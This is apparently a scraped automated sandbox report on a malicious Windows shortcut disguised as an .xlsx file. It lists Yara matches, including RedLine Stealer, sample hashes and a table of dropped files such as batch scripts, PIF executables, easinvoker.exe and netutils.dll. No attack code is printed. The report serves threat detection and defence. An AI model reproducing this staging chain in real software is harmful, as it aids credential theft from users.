Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
FT. 40FE CNY .xlsx.lnk

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1430751
Product:	CloudBasic
Start time:	06:44:15
Start date:	24.04.2024
Sample:	FT. 40FE CNY .xlsx.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	82fde340f187a517e0feced1d4972363
SHA1:	07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256:	e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	8107C44FFAE18504731873FF06C8ABE1	C07323DF119B7CB044660066615A03D5BFFF550C	D763396AE855BCF39008DD03A914A059DEC87C400398F3A1A442C27E2B8F0F8E
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x5990b467, page size 16384, DirtyShutdown, Windows version 10.0	87B55928FC615D66251922BB21FFFF71	02057BCCD711301E9457B0625F94230E2D5DF3EF	5A4FAB1A20F616FF00E04A119ED37139AAACC41DC3194FB451FBFF503D6D1F21
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	1278C12E3DCE809C7FE1D27BFD5B7B2B	E130000151DBFEDC6C2E7D175A16FF39EBE73380	8C574CE134E618AB83C42537E68A97BFC0610A5320CC81E420829C596AE19B58
C:\Users\Public\Libraries\KDECO.bat	DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators	71E46EFE9932B83B397B44052513FB49	741AF3B8C31095A0CC2C39C41E62279684913205	11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
C:\Users\Public\Libraries\Null	ASCII text, with CRLF line terminators	6E7931A650D82FA4F83332BEBE8AD018	311732BAD841789F43C3EF055A9FDF8A261AE4A8	CE60DA21A19E0A3D484FC4EE3F868999745B7F23475772EA8C87C7BDE54C4B43
C:\Users\Public\Libraries\Ucvuiswb	data	83DDE1E0DA8E837B3C94EE26FE5E9FE1	7851FCC15BDBCE2DCB0565FE78F52DC879A14569	3183D63A4383372B36A88237E077FF92960605391CE897B55E3B0D4384A1FCCD
C:\Users\Public\Libraries\Ucvuiswb.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	E6AC6CA27AA2D60DC59A21AF1FFDB086	9F847E34521E8917C8B22ECA53B71306BC19AF18	A5B3CE892D48757DF98FEA906DFF92E0210DCBD8D1832E43DFBD2A5ECE61FBA1
C:\Users\Public\Libraries\UcvuiswbO.bat	Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators	828FFBF60677999579DAFE4BF3919C63	A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC	ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
C:\Users\Public\Libraries\bwsiuvcU.pif	PE32 executable (GUI) Intel 80386, for MS Windows	C116D3604CEAFE7057D77FF27552C215	452B14432FB5758B46F2897AECCD89F7C82A727D	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
C:\Users\Public\Libraries\easinvoker.exe	PE32+ executable (GUI) x86-64, for MS Windows	231CE1E1D7D98B44371FFFF407D68B59	25510D0F6353DBF0C9F72FC880DE7585E34B28FF	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
C:\Users\Public\Libraries\netutils.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	6BAAEA4D3A65281B55173738795EB02C	1FBE7EC7F5E2D1FB0AB1807E149EEE66A86F9224	0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1
C:\Users\Public\Ucvuiswb.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF">), ASCII text, with CRLF line terminators	64D91CB26E13C242023735D5311725A4	1B3B3318CDB9098A3DCAD96ECF57D983663E5013	98DCFD594B2BEFC0AFF0F77CB17E65BA85A89104A848DC003C81289A3C1B6635
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta	PGP Secret Sub-key -	16D297E8EEE126E4B52198EFF43B6C36	5FF70DD47D868EDB3F837511A55030810EC7968B	9A3B2D8D0E1DA113F6C12A4D1517C71B8810006A3031CF129CE2ACE2B2BE673F
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	EF4099FCAB6D29945272316889156337	5AAFAD4581D21179B892604BEBD6038792F8CBD6	A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	data	937B7C51E18308029AF0712C90527DF8	3138CAC41F1620E3823BA42E8940897D0E9D33B9	DBBE368ED1DA16AC950E52E3654DEDA0A4BABADAFF98174DC4D2B688D9814D4C
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h2akx4p.gbt.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqgntrab.1pq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzb3csfr.kno.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4fvewj.ald.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwcvnjfy.hms.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9695268fa6a0c8b2.customDestinations-ms (copy)	data	F0AF6AC48366F8841F3F87FC0169B09F	1743C152D36A35FAD3F38A5F3435DDE13425BB05	84F2B4171FE48BB6EF9D9D36CF2A392EF57AC100C111C608883B3F4D4A9789BF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A20HZKL49GMHZSOAZMF6.temp	data	F0AF6AC48366F8841F3F87FC0169B09F	1743C152D36A35FAD3F38A5F3435DDE13425BB05	84F2B4171FE48BB6EF9D9D36CF2A392EF57AC100C111C608883B3F4D4A9789BF
C:\Users\user\AppData\Roaming\uc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	E6AC6CA27AA2D60DC59A21AF1FFDB086	9F847E34521E8917C8B22ECA53B71306BC19AF18	A5B3CE892D48757DF98FEA906DFF92E0210DCBD8D1832E43DFBD2A5ECE61FBA1
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report FT. 40FE CNY .xlsx.lnk

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
FT. 40FE CNY .xlsx.lnk

Malware Threat Intel
Provided by